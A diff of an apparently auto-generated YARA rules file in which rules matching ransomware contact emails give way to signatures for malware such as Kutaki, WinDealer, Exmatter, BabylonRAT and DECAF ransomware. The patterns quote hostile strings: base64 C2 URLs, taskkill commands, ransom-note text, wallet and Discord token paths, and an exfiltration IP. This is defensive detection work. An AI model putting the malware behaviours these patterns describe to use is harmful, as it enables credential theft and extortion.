-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L108-L123"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8141-L8158"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "27b75a476229fc877c316f7a61d1ed647f5a67ac44a174d86c084063f039b20c"
+		logic_hash = "5345c2b03e14b7324a13bac0da783eec8c30da18043c1b2d46162e5b511fae63"
 		score = 75
-		quality = 34
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "portstatrelea1982@protonmail.om" ascii wide nocase
-		$s2 = "unlock@eqaltech.su" ascii wide nocase
-		$s3 = "unlock@royalmail.su" ascii wide nocase
-		$s4 = "adexsin276@gmail.com" ascii wide nocase
-		$s5 = "nbactocepnyou@protonmail.com" ascii wide nocase
-		$s6 = "nunlock@eqaltech.su" ascii wide nocase
-		$s7 = "nsnlock@royalmail.su" ascii wide nocase
-		$s8 = "cersiacsofal@protonmail.com" ascii wide nocase
+		$s1 = "pidhtmpfile.tmp" fullword ascii
+		$s2 = "pidhtmpdata.tmp" fullword ascii
+		$s3 = "pidHTSIG" fullword ascii
+		$s4 = "Taskmgr.exe" fullword ascii
+		$s5 = "[HP][" ascii
+		$s6 = "[PP][" ascii
+		$s7 = { 70 69 64 68 74 6d 70 66 69 6c 65 2e 74 6d 70 00
+                2e 64 6c 6c 00 00 00 00 70 69 64 48 54 53 49 47
+                00 00 00 00 ?? ?? 00 00 54 61 73 6b 6d 67 72 2e
+                65 78 65 }
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Buran
+rule DITEKSHEN_MALWARE_Win_Kutaki : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Buran ransomware"
-		author = "ditekShen"
-		id = "63cdda3f-78ed-5ce5-a8e0-e0893f2c314e"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Kutaki"
+		author = "ditekSHen"
+		id = "d91812bb-4564-56b5-9757-81255b5233fb"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L125-L140"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8160-L8173"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "685126efa7f90ce296fc616bd8d5d89a5b4b9aba8b60601b29534de21a0d0015"
+		logic_hash = "24fbc9ca6de421275813c285a8fca91cfcede48f4b4de9feda010c644f0c251f"
 		score = 75
-		quality = 59
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "recovery_server@protonmail.com" ascii wide nocase
-		$s2 = "recovery1server@cock.li" ascii wide nocase
-		$s3 = "polssh1@protonmail.com" ascii wide nocase
-		$s4 = "polssh@protonmail.com" ascii wide nocase
-		$s5 = "buransupport@exploit.im" ascii wide nocase
-		$s6 = "buransupport@xmpp.jp" ascii wide nocase
-		$s7 = "jacksteam2018@protonmail.com" ascii wide nocase
-		$s8 = "notesteam2018@tutanota.com" ascii wide nocase
+		$x1 = "AASEaHR0cDovL29qb3JvYmlhLmNsdWIvbGFwdG9wL2xhcHRvcC5waHA" ascii
+		$x2 = "aHR0cDovL3RlcmViaW5uYWhpY2MuY2x1Yi9zZWMva29vbC50eHQ" ascii
+		$s1 = "wewqeuuiwe[XXXXXXX]" ascii
+		$s2 = "alt|aHR0cD" ascii
+		$s3 = "<rdf:Description about='uuid:fb761dc9-9daf-11d9-9a32-fcf1da45dca2'" ascii
+		$s4 = "<rdf:Description about='uuid:0ab54f47-96d6-11d9-a59c-cbc93330e07e'" ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or ( all of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ransomwareexx
+rule DITEKSHEN_MALWARE_Win_Dlinjector06 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with RansomwareEXX Linux ransomware"
-		author = "ditekShen"
-		id = "dfcff8cb-c50c-559e-b5b9-8c2cdac7a3dc"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects downloader / injector"
+		author = "ditekSHen"
+		id = "9d8164ee-49b3-5eb1-bd1d-9437fc6f1392"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L142-L150"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8175-L8189"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a83ada5d29c6d62a292c4b3a1379558cddcaf63d97dbdfc6afd27cc52f6f656d"
+		logic_hash = "e44ea8dbb94c6cd3b63d66eac3e9b3d6d5ff7d561410b8328e6c24630645305b"
 		score = 75
-		quality = 73
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "france.eigs@protonmail.com" ascii wide nocase
+		$s1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" ascii wide
+		$s2 = "Content-Type: application/x-www-form-urlencoded" wide
+		$s3 = "https://ipinfo.io/" wide
+		$s4 = "https://db-ip.com/" wide
+		$s5 = "https://www.maxmind.com/en/locate-my-ip-address" wide
+		$s6 = "https://ipgeolocation.io/" wide
+		$s7 = "POST" fullword wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Phobos
+rule DITEKSHEN_MALWARE_Win_Crown : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Phobos ransomware"
-		author = "ditekShen"
-		id = "cee09220-4038-5190-b595-28f67c845588"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Crown Tech Support Scam"
+		author = "ditekSHen"
+		id = "ac4551d0-a574-5287-9b37-899c736db792"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L152-L161"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8191-L8211"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cf9e163d2315d465afb47bf83f30d5d27e14c4cbbc1c235dcb15b75fb509ba7d"
+		logic_hash = "eeb36993c93d76ed118643ee417f15e1768015f72464dbabca7ae001f64a0aef"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 75
+		tags = "FILE"
+		snort_sid = "920251-920261"
 
 	strings:
-		$s1 = "helprecover@foxmail.com" ascii wide nocase
-		$s2 = "recoverhelp2020@thesecure.biz" ascii wide nocase
+		$d1 = "//prodownload.live" ascii
+		$c1 = "&uid=" ascii
+		$c2 = "&ver=" ascii
+		$c3 = "&mcid=" ascii
+		$c4 = ".php?uid=" ascii
+		$c5 = ".php?ip=" ascii
+		$s1 = "Operating System Support ID:" ascii
+		$s2 = "taskkill /IM explorer.exe -f" ascii nocase
+		$s3 = "/C taskkill /IM Taskmgr.exe -f" ascii nocase
+		$s4 = "FastSuport" fullword ascii
+		$s5 = "Support Override!" fullword wide
+		$s6 = "Support Assistance Override Activated!" fullword wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $c* ) or 4 of ( $s* ) or ( 1 of ( $d* ) and ( 3 of ( $c* ) or 2 of ( $s* ) ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Epsilon
+
+rule DITEKSHEN_MALWARE_Win_Floodfix : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Epsilon ransomware"
-		author = "ditekShen"
-		id = "acdeb3b1-872b-5892-9dfe-2e506f767da2"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects FloodFix"
+		author = "ditekSHen"
+		id = "b05b0b40-0de8-58a0-889e-44a12d346de4"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L163-L171"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8213-L8219"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "163694ed2ae181764fc6e62027487d183114be35a689dd44d4d9761149df244b"
+		logic_hash = "d7da820b00ef5ee2e943b012cfa57421a39f8a7bfc627cc1909151a47092a26d"
 		score = 75
-		quality = 73
-		tags = ""
-
-	strings:
-		$s1 = "neftet@tutanota.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( pe.exports ( "FloodFix" ) or pe.exports ( "FloodFix2" ) ) and pe.exports ( "crc32" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Thanos
+rule DITEKSHEN_MALWARE_Win_UNK_Infostealer : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Thanos ransomware"
-		author = "ditekShen"
-		id = "22ffb4c9-f113-5d3e-a466-6c384c0c6e8a"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects unknown information stealer"
+		author = "ditekSHen"
+		id = "f6f9816f-79bd-527c-9c0f-24e09c95ae35"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L173-L182"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8221-L8246"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "039ea384136a1aaa261702ed75ab9358aaa1ec2d5a8d35fe4789647f39490c7c"
+		logic_hash = "ca57ebf4b56020d278ec8a7e721c72de7a1f925a8e7f1f3a9edc8a70b88ff9d1"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 75
+		tags = "FILE"
+		snort_sid = "920263"
+		hash1 = "b7a2cb34d3bc42d6d4c9d9af7dd406e2a5caef8ea46e5d09773feeb9920a6b21"
+		hash2 = "dd95377842932d77e225b126749e1e6e8ecd6f5c6540d084a551a80a54d02d7d"
+		hash3 = "12f790d9a0775b5e62effc6ea9e55bbef345fffbfb2f671f85098c4f7661dd0f"
+		hash4 = "0a4cea763dffde451c75a434143fc5d014c32c6d1f8f34920ea5f2854e62118f"
 
 	strings:
-		$s1 = "my-contact-email@protonmail.com" ascii wide nocase
-		$s2 = "get-my-data@protonmail.com" ascii wide nocase
+		$s1 = "%s\\%s\\%s-Qt" fullword wide
+		$s2 = "%s\\%s.json" fullword wide
+		$s3 = "*.mmd*" fullword wide
+		$s4 = "%s\\%s.vdf" fullword wide
+		$s5 = "%-50s %s" fullword wide
+		$s6 = "dISCORD|lOCAL" fullword ascii nocase
+		$s7 = "sTORAGE|LEVELDB" fullword ascii nocase
+		$s8 = ".coin" fullword ascii
+		$s9 = ".emc" fullword ascii
+		$s10 = ".lib" fullword ascii
+		$s11 = ".bazar" fullword ascii
+		$s12 = "id=%d" fullword ascii
+		$s13 = "2:?/v /v /v /^Y" fullword ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Vovalex
+rule DITEKSHEN_MALWARE_Win_DECAF : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Vovalex ransomware"
-		author = "ditekShen"
-		id = "95e9ddce-8a19-59f1-baf4-bdac61c9c396"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects DECAF ransomware"
+		author = "ditekSHen"
+		id = "c6e4ce00-0be9-572d-987c-c47d699002f0"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L184-L192"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8248-L8268"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0e8b426e55c1efaf59e5f255f1da9cdfbb509561d3f7ea5baa2815c3131866eb"
+		logic_hash = "5d79a4f310fb00022eb9d636f161227e84a7e15517c4d2c39acafa7d81af5c2a"
 		score = 75
-		quality = 73
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "vovanandlexus@cock.li" ascii wide nocase
+		$s1 = "main.EncWorker" fullword ascii
+		$s2 = "Paths2Encrypt" fullword ascii
+		$s3 = "/cmd/encryptor/main.go" ascii
+		$s4 = "*win.FileUtils; .autotmp_41 *lib.Encryptor; .autotmp_" ascii
+		$s5 = "\"Microsoft Window" fullword wide
+		$s6 = "Legal_Policy_Statement" fullword wide
+		$s7 = ").Encrypt." ascii
+		$s8 = "*struct { F uintptr; pw *os.File; c *" ascii
+		$s9 = ".ListFilesToEnc." ascii
+		$m1 = "WINNER WINNER CHICKEN DINNER" ascii
+		$m2 = "All your servers and computers are encrypted" ascii
+		$m3 = "We guarantee to decrypt one image file for free." ascii
+		$m4 = "We WILL NOT be able to RESTORE them." ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or 3 of ( $m* ) or ( 1 of ( $m* ) and 2 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Alumnilocker
+
+rule DITEKSHEN_MALWARE_Win_Windealer : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with AlumniLocker ransomware"
-		author = "ditekShen"
-		id = "64b6aff8-3758-5837-b814-e2505a9c12a3"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects WinDealer"
+		author = "ditekSHen"
+		id = "d4f3b0cc-121e-5032-9721-1e2a86842fa5"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L194-L202"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8270-L8301"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aeab9cb2b2da246e1863cd1102d901d322017d0b309e852d83e4f66f6e4bdd22"
+		logic_hash = "eabc41ea69f142ee7c243cbc75ceda909a722be382ad91a01c805aef637be915"
 		score = 75
 		quality = 73
-		tags = ""
+		tags = "FILE"
+		snort_sid = "920264"
 
 	strings:
-		$s1 = "alumnilocker@protonmail.com" ascii wide nocase
+		$d1 = "downfile" fullword ascii
+		$d2 = "getmypath" fullword ascii
+		$d3 = "content-type: monitor" fullword ascii
+		$d4 = "content-type: UsedType" fullword ascii
+		$d5 = "write command error" fullword ascii
+		$d6 = "C:\\WINDOWS\\system32\\kernel32.dll" fullword ascii
+		$l1 = "currentconfig" fullword ascii
+		$l2 = "remotedomain" fullword ascii
+		$l3 = "reserveip" fullword ascii
+		$l4 = "otherinfo" fullword ascii
+		$l5 = "filelen" fullword ascii
+		$l6 = "%s%s.bak" fullword wide
+		$l7 = "localmachine" fullword ascii
+		$l8 = "remoteip" fullword ascii
+		$l9 = "datastate" fullword ascii
+		$l10 = "SYSTEM\\CurrentControlSet\\Control\\Network\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\%s\\Connection" fullword ascii
+		$s1 = "%s\\%s\\V5_History.dat" fullword wide
+		$s2 = "%s\\%s\\history2.dat" fullword wide
+		$s3 = "%s\\%s\\history.imw" fullword wide
+		$s4 = "%s\\%s\\main.imw" fullword wide
+		$s5 = "%s%d.%d.%d.%dWindows/%u" fullword ascii
+		$s6 = "%s\\%c_%s_tmp" fullword wide
+		$s7 = "%s\\%s\\main.db" fullword wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( ( 4 of ( $d* ) and 1 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $d* ) ) or 6 of ( $l* ) or ( pe.exports ( "DealC" ) and pe.exports ( "DealR" ) and pe.exports ( "DealS" ) and 1 of them ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Doejocrypt
+rule DITEKSHEN_MALWARE_Win_Exmatter : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with DoejoCrypt ransomware"
-		author = "ditekShen"
-		id = "bdf67fd3-8614-52f0-8804-9905f067a848"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects BlackMatter data exfiltration tool"
+		author = "ditekSHen"
+		id = "93df7a68-1e19-5db3-95d4-39d77d1036d8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L204-L213"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8303-L8325"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b76996ef413d017fa571115f7331154c808fed0f1b1e0c97241cadbbef260a00"
+		logic_hash = "25a35c82919f96bdba00558616f574e901b83785713ed1a63a6f06df576777cd"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 75
+		tags = "FILE"
+		hash1 = "4a0e10e1e9fea0906379f99fa350b91c2af37f0fd2cc55491643cc71a9887d30"
+		hash2 = "a5e050f1278473d41c3a3d6f98f3fd82932f51a937bc57d8f5605815f0efb0f8"
 
 	strings:
-		$s1 = "konedieyp@airmail.cc" ascii wide nocase
-		$s2 = "uenwonken@memail.com" ascii wide nocase
+		$s1 = "Renci.SshNet." ascii
+		$s2 = "DirNotEmpty" fullword ascii
+		$s3 = "MkDir" fullword ascii
+		$s4 = "RmDir" fullword ascii
+		$s5 = "get_MainWindowHandle" fullword ascii
+		$s6 = "GetCurrentProcess" fullword ascii
+		$s7 = "]]>]]>" fullword wide
+		$s8 = "1.3.132.0.35" fullword wide
+		$s9 = "1.3.132.0.34" fullword wide
+		$s10 = "1.2.840.10045.3.1.7" fullword wide
+		$x1 = "sender2.pdb" fullword ascii
+		$x2 = { 64 00 61 00 74 00 61 00 ?? 72 00 6f 00 6f 00 74 }
+		$x3 = "157.230.28.192" fullword wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $x* ) and 7 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Purge
+rule DITEKSHEN_MALWARE_Win_Brbbot : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Purge ransomware"
-		author = "ditekShen"
-		id = "2a0f2c69-b179-5e48-9db6-be25e329f72b"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects BrbBot"
+		author = "ditekSHen"
+		id = "d77dfdcf-4cd5-578e-99eb-c987e7b5b706"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L215-L224"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8327-L8345"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "49f3f5a88212d4bed1f0237a4437fb537e84cd6dd26c5fe224250f3b6e39d384"
+		logic_hash = "64df5bba698fbba1baf27eedb9a2eb46c5e0752996ea91900f8377200d54eeeb"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 75
+		tags = "FILE"
+		snort_sid = "920265"
 
 	strings:
-		$s1 = "rscl@dr.com" ascii wide nocase
-		$s2 = "rscl@usa.com" ascii wide nocase
+		$x1 = "brbconfig.tmp" fullword ascii
+		$x2 = "brbbot" fullword ascii
+		$s1 = "%s?i=%s&c=%s&p=%s" fullword ascii
+		$s2 = "exec" fullword ascii
+		$s3 = "CONFIG" fullword ascii wide
+		$s4 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" fullword ascii
+		$s5 = { 43 4f 4e 46 49 47 00 00 65 6e 63 6f 64 65 00 00
+                73 6c 65 65 70 00 00 00 65 78 69 74 00 00 00 00
+                63 6f 6e 66 00 00 00 00 66 69 6c 65 00 00 00 00
+                65 78 65 63 }
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $x* ) and 1 of ( $s* ) ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or all of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Zeoticus
+rule DITEKSHEN_MALWARE_Win_Babylonrat : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Zeoticus ransomware"
-		author = "ditekShen"
-		id = "4d5f0d6d-f792-563d-9a9b-1986f5af8743"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects BabylonRAT / CollectorStealer / ParadoxRAT"
+		author = "ditekSHen"
+		id = "7352e0cf-64ab-5ba4-afaf-04067a0046e8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L226-L235"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8347-L8373"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7a83b15b0c8e81f67d11f8b5d9a43ba4e1e3a0f6741ddd0daafe4e742dd91cd8"
+		logic_hash = "352efb98e298e9f0ce17c20d44d193f2565ec559923210d80dec1a0988545a30"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 50
+		tags = "FILE"
 
 	strings:
-		$s1 = "anobtanium@tutanota.com" ascii wide nocase
-		$s2 = "anobtanium@cock.li" ascii wide nocase
+		$x1 = "Babylon RAT Client" wide nocase
+		$x2 = "ParadoxRAT_Client" fullword ascii
+		$s1 = "@ConfigsEx" fullword wide
+		$s2 = "ClipBoard.txt" fullword wide
+		$s3 = "[%02d/%02d/%d %02d:%02d:%02d] [%s] (%s):" fullword wide
+		$s4 = "\\%Y %m %d - %I %M %p" fullword wide
+		$s5 = "[%02d/%02d/%d %02d:%02d:%02d] (%s)" fullword wide
+		$s6 = " c:\\Windows\\system32\\cmd.exe" fullword wide
+		$s7 = "Update Failed [OpenProcess]" wide
+		$s8 = "DoS Already Active..." fullword wide
+		$s9 = "File Downloaded and Execut" wide
+		$s10 = "LgDError33x98dGetProcAddress" fullword wide
+		$s11 = "@SPYNET" fullword wide
+		$s12 = "Recovery.Recovery" fullword wide
+		$s13 = "GetChrome" fullword wide
+		$s14 = "\\drivers\\etc\\HOSTS" fullword ascii
+		$s15 = "plugin-container.exe" fullword ascii
+		$s16 = "bss_server.usrRelay" fullword ascii
+		$s17 = "sckRelay" fullword ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 8 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Jobcryptor
+rule DITEKSHEN_MALWARE_Win_Netsupport : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with JobCryptor ransomware"
-		author = "ditekShen"
-		id = "406f5638-883b-57a4-a2ba-532d2bd3ae83"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects NetSupport client"
+		author = "ditekSHen"
+		id = "958e82c5-aeac-58f4-b214-a9382b598cd9"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L237-L247"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8375-L8386"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c8c5dcc0d7484a3ac6e702cca8bd0907f9e4f4aea5e99c4c3f988389e0d803a7"
+		logic_hash = "4e8120d902fdee2a3f87c85bb6bb7d3bba79e3828500f297c2dc57d5213cf6a8"
 		score = 75
-		quality = 69
-		tags = ""
+		quality = 50
+		tags = "FILE"
+		snort_sid = "920266-920267"
 
 	strings:
-		$s1 = "olaggoune235@protonmail.ch" ascii wide nocase
-		$s2 = "ouardia11@tutanota.com" ascii wide nocase
-		$s3 = "laggouneo11@gmail.com" ascii wide nocase
+		$s1 = ":\\nsmsrc\\nsm\\" fullword ascii
+		$s2 = "name=\"NetSupport Client Configurator\"" fullword ascii
+		$s3 = "<description>NetSupport Manager Remote Control.</description>" fullword ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Cuba
+
+rule DITEKSHEN_MALWARE_Win_Gobrutloader : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with JobCryptor ransomware"
-		author = "ditekShen"
-		id = "5eea027d-2164-54f2-a2bf-74b5d532e610"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects GoBrut StealthWorker laoder"
+		author = "ditekSHen"
+		id = "748f8055-71d9-5757-8eb0-90dc3ee35c74"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L249-L261"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8388-L8394"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b734199c8593c338c803518b2729e9d9ceaaed5d21585a3d299885433d8f796e"
+		logic_hash = "6241117cffb147763ace41b36cd1524f48bfc7cb06d56a82d7b30bec9e1baf5b"
 		score = 75
-		quality = 65
-		tags = ""
-
-	strings:
-		$s1 = "helpadmin2@protonmail.com" ascii wide nocase
-		$s2 = "helpadmin2@cock.li" ascii wide nocase
-		$s3 = "mfra@cock.li" ascii wide nocase
-		$s4 = "admin@cuba-supp.com" ascii wide nocase
-		$s5 = "cuba_support@exploit.im" ascii wide nocase
+		quality = 75
+		tags = "FILE"
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and pe.exports ( "@SetFirstEverVice@8" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Hello
+rule DITEKSHEN_MALWARE_Win_Milan : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Hello / WickrMe ransomware"
-		author = "ditekShen"
-		id = "02bbaa61-7ea3-5edd-8b38-27ef1f6ee1e2"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Milan Lyceum backdoor"
+		author = "ditekSHen"
+		id = "2ea0775b-65d4-58b9-9af9-c07f29742627"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L263-L277"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8396-L8467"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dfafb0323a50891c03c4b706d4f3a6a511cecdee2448c1f554b416ba1e3d3df9"
+		logic_hash = "102af43be7cc3d873fbce78c95c767ebb6aadb2e7084b48f3cf48c11071d7a71"
 		score = 75
-		quality = 61
-		tags = ""
+		quality = 50
+		tags = "FILE"
